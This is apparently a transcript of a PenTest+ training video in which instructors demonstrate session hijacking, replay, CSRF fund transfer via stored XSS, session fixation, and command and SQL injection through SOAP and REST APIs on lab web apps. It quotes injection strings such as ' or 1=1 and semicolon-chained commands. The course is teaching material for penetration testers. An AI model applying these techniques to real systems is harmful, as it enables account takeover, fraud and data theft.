Kali. And what is this? There is a session cookie. Yay. So now we have successfully hijacked somebody else's cookie. We now have possession of said cookie. As long as that cookie is a valid cookie or token, we can now use that to do anything and manipulate and impersonate that end user.
How long do these sessions kind of last? So like they close out the browser, is it still valid?
Sometimes, yes. Sometimes session management is really important, obviously, because if you're not invalidating session tokens after people have logged out and they still be good, they can still be good, right? So just because somebody logs out doesn't necessarily mean that we've lost access to the system, right? So now what I want to do is I want to take that cookie and I want to use it for various purposes, right? So let's say I'm going to copy that. The old copy selection happening. Jump back in the browser, and to do this, I'm basically just going to use my developer tools for my browser. For Firefox, it's Shift Control I, and you'll notice under the storage tab, which is right here, we have cookie information, like PHP sys ID, and there's the value. Let me just go in and Control V, the new value, hit enter.
So you just overwrote the value that you had with this one that you have just.
Absolutely right.
Now is that a something else in terms of the attack now? Because the first one's you taking the cookie.
Correct.
So now you're using that cookie. Would that be considered different?
Yes, it would be considered different. Now we're kind of moving into the idea of a session replay attack. Okay. Right. So hijacking and replay very closely connected. Just minor differences. And I would say you probably could play the two. Okay. Pretty easy. And everybody would be like, okay, because ultimately we're just taking the cookie and using the cookie to do things either to delay a response or repeat a response or do something that cookie can do. Right. Which is typically just under the umbrella of session hijacking. Typically, but for PenTest Plus they call it out as specifically two different things. So I want to make sure to give you some distinction there. Okay. So now that value is set, let's see what happens. So we see that I'm logged in as hacker, right? Now that that is set, let's go to bugs, and you'll notice. Right, come back to me. I'm now logged in as B. Guess what? B is the admin of the system. I have now full control of this, which is privilege escalation, even. So this can be used for PrivEsc. But this is what's going on. I've replayed that session token, and it now sees me as a different user because that token says that this is that user, and now that user can do anything that user is allowed to do, which essentially the admin can do whatever you like. Right? So we're starting to see the real reason why we're afraid of XSS as being part of our web applications, and why we need pen testers out there who can competently look for, test for, and even validate that it would be an attack vector against our systems.
Now the next one that you have listed is CSRF. Is that cross-site request forwarding?
That is cross-site request
All right,
forwarding.
just make sure.
All day long. Good job, Ronnie. Sometimes you do see this as SRF. Right. So there's multiple ways in which you can see this. Really quickly, and CSRF is going to abuse the trust relationship between a user and an application. Now that's a fancy way of saying that if you log into a web app, you get a session token, right? It now trusts you. You are validated because you successfully authenticated, right? So you're good to go. There's a trust relationship. Now, I don't know about you, Ronnie, you tell me if I'm on or not. I typically have, 10, 15 tabs open at a time?
Easily,
right?
Yeah.
I'm logged into multiple different platforms, doing multiple different things. You might have experiences as well in your life. Ronnie, that's true for you as well.
Absolutely.
We're starting to see that's a commonality. While I'm continually logged in, I haven't logged out and they're doing proper session management. If I'm still logged in, I have a trust relationship built between myself and an application. CSRF looks to abuse that, right? So how does that work? What does that look like? Well, what we can do is, let's jump into here to Matilda. So I got Matilda. Am I logged into this thing? You see here? Yeah, I'm logged in as user hacker. Yay, good for me. But what I want to do is I want to set up a CSRF attack. I'm going to use cross-site scripting to do it. Cross-site scripting shuts up everybody. So what I want to do is I'm going to look for cross-site scripting. There's one right there, and I'm going to look for persistent or stored cross-site scripting, as we know it as. Persistent is another way of putting it. I'm going to look to add to your blog. Now let's go. All right, so here I'm going to do a very similar technique as what we just saw with session hijacking, but just slightly off, slightly different. What I want to do is, script is, a lot of times CSRF is used for stealing money. It's a very common, maybe changing passwords, anything like that. And I'll show you how that works here in just a second. What I'm going to do is I'm going to do the same thing, new image, bang.src equals, bam. And this is where I'm going to abuse trust relationships. Now you notice multi-day is not BWAP, completely two different web apps. This is why it's cross-site request forgery. We're going across different sites. So what I can do is in the portal here, if I go to the CSRF attack areas, let's see, cross-site scripting, cross-sites, where are you, cross-site request forgery? There we are. And let's do this transfer amount one, right? So transfer hit money. And you get this application. This is the amount on your account. It might be a little too small for everybody. Amount on your account is 1,000 euros. Here's an account to transfer. So this is some sort of monetary transfer app, right? You tell the account you want to transfer, how much you want to transfer, and how much you have available is shown to you. So if I say I want to transfer €1 and hit transfer, I can now see the account has only 999 euros. Excellent. Well, as the attacker, I'm setting up for a CSRF attack. Now I'm going to go here into the URL, and I can see I have access to all this stuff. I'm going to copy that. So instead of €1, maybe I change that. Maybe I make it a little something different. Now let's say that this 1, 2, 3, 4, 5, 6, 7, 8, 9, 0 is my account, right? That would be my own account that I want to transfer money to. Great. Now anybody else that uses this app, if they also use the multi-day app and visit that blog site, after just a moment, anytime they do, they're going to transfer funds from that account, right? So if I have an account that I want to transfer funds from, this is going to work really well. Yeah, because it's not a 2 with the from, I believe. Maybe that's the other way. That's weird. Whatever they're showing you though, that's the one that's going to get popped. And since we're logged in as B, well, that's who's going to lose some money. Anybody that's logged in should feel hurt on this. So it's not, did I copy it? I think I did. Copy. Let's get back over to multi-day, and here I'm going to pop that in, hit paste, finish that off, and then close my script tags. That's great. Bam. Now that we have all this in here, I can easily manipulate this to make sure that the account that it's transferring to is the right number account, and the amount that I want to transfer is the right amount. So say 300 instead of 1, right? So this will pretend this is the account of our evilness, and that's the account we want them to go to. Sound good? Sound good. All right. I would hit save log entry, and now anytime that somebody goes to that, so if let's see here, let's visit that page of 192.168.241.140, I believe. No, 141 is what it's like. I don't remember. Yes. Go here. Yeah, excuse me, problem. And there we go. Delivery vulnerable. I'm just kind of like, you'll notice I'm still logged in as B, right? Gonna abuse that trust. And wait, what's way delivery vulnerable until today? And I want to just kind of go to that X. Where's that X? A7? Is it A7? There you go. Thank you, sir. Selected persistent to my blog, and I want to view blogs. You see, there's an anonymous blog. Yeah. Oh, it's because I'm not logged in. So anyway, once they log in, they would see the other blogs. I think I can hit view blogs and see if I can show somebody else's blog. Who am I logged in as? Hacker. View blog entries. There we go. There's the entry. Cross-site scripting should have just happened. We should see that account as being depleted at this point. So let's go here. Let's surf to that page and see what happens. I think it's way down here at the bottom. Cross-site scripting. There it is. And transfer amounts. Hit hack. You'll notice that we are now 699 euros, which is $300 less. And did we do that? No, we did not. We did was visit a web page. But because of CSRF, it was able to transfer those funds because of the trust relationship that this user had in their browser with that site. So you start to see the danger of CSRF is a very popular attack, especially if you can do things like transfer funds to my own accounts, which is yay for me. I'm a hacker. I just make $300. Unfortunately for this person, maybe they're not buying groceries this month.
All right, so how does this lead into, or any of this, is this related to anything that you'd call session fixation?
So session fixation is a different type of attack, and it has some, I think they all share some similarities. You know, obviously as we saw here with CSRF, where we use cross-site scripting, just like we did with session, where I didn't have to steal a session token with CSRF like we did with session hijacking and replay. Session fixation does also involve tokens. Unfortunately, I don't have an easy way to show. This is a difficult one to show, but I can kind of give you some of the basics that go around session fixation. Typically, let's start off with the definition. The definition of a session fixation attack is I'm going to fixate a session ID for Ronnie. I'm going to kind of like give that to you. That's what I want you to log in as. Okay? If I can control the user experience with getting a specific session ID or session token, then I can do session fixation. Hence the idea. You are fixating on a specific session token. Okay? Does that make sense? If I log into a website, let's say you go to a website, right? And you're looking at things with Burp Suite, and you say, before I log in, do I get a session token at all? A lot of websites do that. It's just some random session token. And then once you log in, you get a new session token. That token is your validation token. But sometimes programmers get lazy, right? And they say, well, just use this. We've already issued you a token. Just use that token. So even after you validate, you get the same token. Right? That's a problem because now I can predict, I can control what token you actually get because it doesn't matter. Okay? Now, typically, you need to couple this with another flaw in the system, which is that session tokens are in the URL. And a lot of times they get passed through the HTTP headers and not in the URL. But it used to be very common, and still is from time to time, to where you see that session token in the URL. Let me show you what I mean. Let's get scroll out here and jump back into colleague. So if I go to the VWAP, there is an area that kind of talks about session weaknesses, and it shows you right there, session ID in the URL. Okay, so hit that, scroll up, oh, get hack, get hack. If we now look, you can see in the URL, there's the session token in the URL. Now, it doesn't have the first part of the thing. Once, if you're not logged in, you go to VWAP, you get a token, but once you log in, you get a new token. So this one really won't work with this, right? At least not that I haven't really tried to fuzz it out too much to figure out whether or not there is a way to do session fixation in VWAP or not, because time being what it is. But if I have both of those factors together, I can now craft a URL that I send you an email. You click on a link, it's got that fixed session ID in that link. You log in, you get that ID. Now I know exactly what your session token is because I told you what it was, and I can log in using the same one. And booyah, we get the same kind of session hijacking that we saw before, right? So there is session. That would be session fixation. Is me being able to manipulate you into using a session token that of my own crafting, right? Once that happens, now I know what it is because I defined it, and we can both share that, and I can act as you and transfer funds and change passwords and log in and do all the things I like to do as you. There you go, my friends. There's some great session attacks for you. Hopefully this was informative and really helpful. It's a really good one to know how to do in real life land as a pen tester, because you're probably going to find this in real life land.
All right, well, that was a lot of material that Daniel just covered for us. Let's go ahead and review this in our list here. Remember that Daniel did start off by taking a look at the idea of session hijacking, being able to get the cookie itself, and then he was able to use that cookie in that session replay as well. And of course, he showed us the cross-site request forgery attack, and then discussed the idea of session fixation. All these are actually very key points for us, not only for the exam, but as Daniel mentioned here in your pen testing career, you're actually want to make sure that you do some of these, and that you actually get good at them too. Well, that's not all that there is. Of course, CompTIA's PenTest Plus, so that means you want to stick around and join us in the very next episode.
Thank you for watching ITProTV.
You know their name. That's right, you've chosen to spend your time with us. We're still not sure why, but overall, though, you know that you're here for API attacks, and Daniel Lowry, of course, is going to actually help us as we come through our PenTest Plus, and we're actually continuing on here. So, Daniel, when it comes down to it, right?
Yeah.
APIs, this may be the first time somebody says API. Really? It's been a while. Right? So let's say it's been a while, right?
Yeah.
And so you're going to help us understand what an API is, and the idea of this is really a big vector of attack, isn't it?
Yeah, and again, it was really overlooked a lot up until recently. Where here we are at the end of 2021. Now it's become a little more common for people to go, you know what we should do? Look for vulnerabilities in our API. Why is that? Because it makes all the calls to our interfaces and in our web applications, and it's passing along information. So maybe there might be a vulnerable vector inside those APIs. So that's what we're taking a look at today. And like I said, it's pretty simplistic when it comes to what an API is, application programming interface, and what that does is it allows you to programmatically do things, or just how the website actually works. Typically with a web application, is what we're looking at here, is if I wanted to pass data along to the web application, I would do it through the API. The API can handle all those system calls, or just the application calls. That's where the vulnerabilities come in. I might not have direct access to it, but if I have access to it another way, maybe through attack proxies such as Burp or Zap, I could then start to meddle with and fiddle with what actually is getting passed from the browser to the web application through the API. And that's where we're going to take a look at how do we get our hands on that, what are the different APIs and what they look like, and what are some of the interesting or useful attacks that we might actually be able to deploy using an API.
Yeah, now speaking of the different types of APIs that are actually out there, this is probably where people will begin to get confused a little bit, thinking that somebody when they mean API, everything's actually going to be the same. But we're actually, you're actually going to show us that there's actually multiple APIs here.
It is.
And the one that we're going to begin with is going to be one called SOAP. SOAP? What the heck is that?
Okay, because I'm back in I know simple object something. Right, simple object access protocol. Right, okay, so here's the thing. If you're a web dev, you're like, oh yeah, SOAP, that's awesome.
Easy.
Soap it up, Ajax, all the other good stuff, WSDL files, all day long. If you're not a web developer, you're probably like, is that the stuff I wash my body with in the shower or my hands at the sink? Okay, that's SOAP. So there you go. It's cool if you're not a web dev. You do not need to be a web dev. You do not need to understand it to the level of a web dev. I will say, the more you do know about these APIs and how to develop web applications and how they work and their interworkings, the better you will be at finding and exploiting vulnerabilities in it. That is the case. I'm sorry, it's just how it is. But for all intents and purposes, you're probably just going to need to know what SOAP is. That is an API, and that it uses things like XML for its structure. And that's basically how it structures the call. So if I want to retrieve a website through a SOAP API or a page or a specific item, then it will structure that using XML and it will pass that information along using XML. There are these things called WSDL files, SDL, and it's escaping me again, horrible acronyms. If you want to fact check me on what WSDL stands for, I just can never remember these things. I'm so bad. I have cheat sheets for this, which I should probably use, so that I outsource that part of my brain so I can keep more important things in there, like what television shows I watch in the 80s. That's obviously a more important thing. Ronnie's giving me WSDL, the acronym for that.
I thought actually, what is the
WSDL.
WSDL. Okay, I kept spelling it wrong.
Pronounced WSDL.
Yeah, so it is Web Service Definition Language.
There you go.
I kept doing DLL, and I was like, why is this not working?
Yeah.
And it's because I was too many else.
That's funny.
Yeah.
At least we look at a WSDL file. Sure. That sounds like a good idea. Maybe this will kind of like uncover some of this here. So just on the computer here. I've got my layout today because guess what? It's got this lovely web services area and SOAP and REST, which is hint, hint. We're gonna go to that next. But let's take one of these. I'll describe this test page as hello world. All right, so here it is in all its glory, right? And you'll notice that view the WSDL for the service, and then click on operation named to view its details. So if I click this WSDL thing, it shows me the WSDL file. There it is. Now, Ronnie, does this type of structure look familiar to you at all?
It looks almost like a web page. Like
It does look very similar to the structure of a web page. I will say that. This is XML.
Okay.
Right? Because remember, SOAP, XML, put them together, they like each other, right? That's kind of how this works. So everything is kind of wrapped up in XML. You say this XML file is not going to have any style information associated with it. Good for us. But what really is important is the kind of things like definitions, target namespace. You can kind of just define things as long as you make it and say and be consistent. It should be usable for your web application. So here are some types: the schema, import, the message that we want to do, the part, name, string, blah blah blah. Right? And you'll notice, comes from Ronnie's point that it starts off with open, close, or greater than, less than the definition. And when you're done with that, you'll see that like slash types is between. So you got types. Anyways, close it because I want you to do that. And then when it's done, you finish it off with a slash types. So whatever's in between that is your type or the types that you have. You might be creating multiple types within there. But there you go. This is XML. You don't have to be an XML expert. You don't have to be like, I must be able to parse through XML perfectly to pass my PenTest. That's not where we're at. Just kind of want to give you some familiarity with what this looks like. This is a WSDL file. Okay, really cool. So that brings us to what can we do with this stuff? Well, if we go back, this was a very basic WSDL. We'll go back and if you click on this hello, kind of like does this thing, gives you a little more formatted output to what's going on here. And you can see hey, we're making a post request and things are happening. And there's all the SOAP environment, so on and so forth. Okay. But what we want to do, let's go back, is let's find that web services area again. Go SOAP. Let's do command injection because it's right there. Why not? Command injection. Did I click it? I did not. Web services SOAP. Command injection. It's a DNS. There we go. So we got this command injection WSDL file here. We click into view the WSDL. We can kind of look through here to try to figure out what this is doing. And this is important for us as to looking for vulnerabilities in SOAP API, right? So returns the results of DNS lookup, sample request, and just trying to kind of see what's going on here. If anything, I mean, that's not really helpful. We got URN here. That might lead me to some bleeding something. Just the idea that it's doing some sort of DNS lookup, and I can see that there's going to be for google.com, and maybe it's using the system commands performance, right? Because we're thinking command injection. It is labeled command injection, but if I were just to look at this, I would start seeing a bunch of DNS look up DNS right here, right? Encoding, schema, for all that stuff's not very well formatted, but it's in there. I might think, well, maybe this is right for command injection. So how do I actually do this? How do I get this thing? Well, this is where Burp Suite comes into play. And Burp Suite has an extension that you'll need to install to be able to do this. There's also a tool called Postman that will help with this as well. But I tend to lean on Burp for just about everything. So there you go. To get this thing, you just gotta go to. You'll see I got this tab up here called WSDL, right? Well, where did I get that? Good question, glad you asked. I got that from. Wait for it. Where's it hiding? We are looking for the extender. So find that extender tab, and then here you have the App Store, and from here you can look for things like WSDL. And there you can see there's WSDL right there, and it is installed. You need to install it. Just roll down here, and you'll find a install button. Pretty simple. Once you're done, you'll have to restart Burp, and you're good to go. But I already got it installed, so that will allow me to be able to use this. So what I need to do is run over to the proxy and find the HTTP history. I'm going to be looking for that WSDL file that I look at. Let's see here. I guess I have to do this. Let's change that back. All right, there's the WSDL file for DNS lookup. Excellent. I can see that down in here. That's the request for that specific thing. I'm going to do is I'm just going to right-click on it, look for my extensions, and send that to parse WSDL. All right, looks like it loaded up. It did turn orange. Click on that. I now see the lookup DNS WSDL request and format in here. Now from here, I'm going to right-click, and I'm going to send to repeater. Now it's in repeater. There is the actual request, the API request. Now I can start to manipulate it and work with it a little bit here. And what I'm looking for is, there it is, like, let me get a little in there. We can see the URN lookup DNS. Aha, that's wrong. Target host, type is XSD string. Cool, and this is just a common placeholder for things that don't have anything in them, okay? So from here, I can just add whatever I like. If I want to go thing, and let's do an ls-AO. And remember, with command injection, I can use a bevy of different characters. The semicolon being my go-to. If that doesn't work, if I do semicolons, that doesn't work. I try ampersands and pipes, operators, and all sorts of fun stuff, right? I'm going to see if this works. I'll just hit send. I'll look over here and see, oh, look at that. I was successful with command injection because now I'm seeing the file right there. I cannot scroll left and right. That's super fun. There we go. So I'm seeing the files of the directory that I'm currently in for I guess the www user. This file, this is where it stands. You can see it's right there. ws-lookup-dns-record.php. That is the file. I could even cat that file, start looking for really interesting information, maybe find usernames and passwords that are embedded, hard-coded into these PHP files. Maybe they're connecting to my SQL database. And now I've got credits to connect to them. Oh, the fun would never end with command injection through your SOAP. let's do a SQL injection real quick, just to kind of see what that looks like. Let me get zoomed out. Let's go back to our web app. Hello, web app. There we go. We'll back up. There is one for, where's it? Web services, SOAP. There we go. SQL injection. SQL injection. Right, right thing. I love how this kind of like bounces around. But there we go. This doesn't look right because I don't see a WSDL page. I'm going to take the rest of them. SOAP, SQL injection. Look up user. There we go. There's a WSDL file. Bam, WSDL file. I can start to see this is looking up usernames. And we'll retrieve information like passwords from this. So that looks really, really interesting for us. I like it. I want it. I want to be a part of this plan. Let's go back. Okay, so again, the workflow. Check the proxy. Find the WSDL file that I found, right click, go to extensions, find Whistler, parse the WSDL, and then go to the Whistler tab. I should then see, oh, look at that, all sorts of wonderful goodness. I can get user, create user, update user, delete user, we'll use get user, that sounds good. Click on that, right click, and send to repeater. Now head to repeater. From there, look, we're seeing something very similar to what we just saw. I'll go in here, and I will start to test, right? Don't get your single quotes, click single quotes, and then we will do like an or 1 equals 1, and I think I'll try the octathorpe here and see what that works for us. Hit send. And we'll start to see, do we get any, oh yeah, there we go. So I dumped the database, so that's fun for us, because I'm seeing username, admin, signatures, got root, Adrian, zombie, films, rock, John likes small. So I'm starting to get, I've gotten information out of the database instead of just one record, I dumped all the records. Really cool. And then of course you can go from there, start your order by, union selects, and start to really dive into the database to see what you can enumerate from there. But there you go, we did command injection and SQL injection using a SOAP API.
All right, now today what's very popular, of course, is also REST APIs. What can we do there?
Yeah, so REST APIs, REST stands for representational state transfer. And really, it kind of just uses the HTTP methods as its API, which is, I guess, why they call it REST. It's RESTful, as they say, a RESTful API. And ultimately, we can do the same things that we just did with SOAP, it's just in a different way, okay? And that's all we really need to understand. Let us get back into the project here and go to here, and we'll back up. And we will find those web services. This time we'll go to REST, and we got SQL injection there. We got this user account management system. This is where I ended up actually accidentally just a moment ago. You'll notice it's not really saying anything. It's saying, hey, the service exposes get, post, put, delete methods. These are HTTP methods, which are commonly used, which are used by RESTful APIs. The service is vulnerable to SQL injection in the security level 0, so that's helpful for us. But ultimately, down here's what we want to see. We have some options. It actually shows us the examples. And you'll notice it's just a URL, right? Some of this could be found in the body of a get or post or whatever, but a lot of times you can do just see it in the URL, and that's how it passes information, i.e. the API, right? So we click this one, we get this example, we can see, okay, we got accounts, and this comes back in like what looks like JSON format, which is very common to the REST APIs. Not that you won't see XML as well, they can use XML, but JSON's much more typical, especially with the JSON web tokens. Everything's kind of all wrapped up in basically foreign code, and it's got ability to do some signatures and things of that nature to encrypt and verify the integrity of them. It's really good. But what we want to do is start to mess with this. So I'm going to go up into this action right here, just into the, let's call that URL, that's what we call it. And again, we can do things like or 1 equals 1, right? And then get that and fire it off. Now it's giving me some interesting SQL syntax garbage. I might be bumping into like URL encoding. This is kind of things you have to kind of fiddle with. Now I didn't see one of the examples. I will try to see. I think I might just need some